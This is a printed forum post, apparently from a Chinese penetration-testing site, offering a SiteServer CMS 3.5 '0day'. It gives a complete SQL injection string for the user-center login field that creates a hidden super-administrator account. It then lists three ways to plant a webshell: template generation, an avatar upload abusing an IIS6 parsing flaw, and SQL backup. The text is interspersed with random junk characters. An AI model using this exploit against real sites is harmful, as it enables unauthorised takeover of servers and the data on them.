中国网络渗透测试联盟

标题: SiteServer CMS 0Day [打印本页]

---

作者: admin    时间: 2013-1-11 21:10
标题: SiteServer CMS 0Day
经测试秒杀最新的3.5版
5 |& u) D  D5 q% |; u
stieserver官网:www.siteserver.cn
3 ~1 x+ w5 j1 l8 A
! C5 ?' s: ]% Q6 C4 b) f+ s9 v! X, ?
4 K. y2 V4 \% R$ k- W
- g- {3 Q/ ~+ q8 f$ A+ UEXP:
+ P# \1 P% S# e1 T0 {8 g5 c
0 l8 m5 f3 S% B' \  u2 x, r' J直接访问UserCenter/login.aspx
* M# \( r+ Y5 l2 N- ~# K1 D
( o: N! f5 {1 r

用户名处输入：
2 `% R9 s' F- ^# g
1 a, H* R, m" F: {3 {& D123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--

+ X" c6 G! [1 K( f. p/ }4 x4 n
" Z0 Z) g2 A! o2 n* M$ L/ v4 v! x
密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。



之后再访问后台SiteServer/login.aspx用插入的用户登陆
9 _( e  X; \7 D% j3 R; |

6 Q1 W3 g  h" a
3 w( [9 z+ O) A  p3 F  n% G+ u: h后台拿webshell的三种方法：
1 d# _7 H! o7 F  w
一、

: Q; D' L4 m6 o( y1 q$ z* K6 T( K站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
  m( {% z* k& r" U
二、

成员权限-》添加用户-》用户名为：1.asp
) ]& |6 _- x9 {2 y6 d- G3 C
5 d- f% V) k; Yhttp://127.0.0.1/usercenter/

" ?. j3 @, z6 e/ B9 w6 [用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
% n7 P6 {4 J( P% Y  D
（ps：后台添加用户时不会验证是否含有非法字符）
; Z7 ~  _7 _2 W  n1 w
三、
  H$ N# u! e* U1 Q8 a
系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径

6 c( w2 v0 P( e/ H& d; ~系统工具-》数据库工具-》SQL语句查询
) n1 j0 Z0 n% ?1 i/ Z; E这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
& m& e4 a2 d; ?$ {4 \: M+ ?3 ~
" A. Q" u: ?+ d) [- B9 f

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2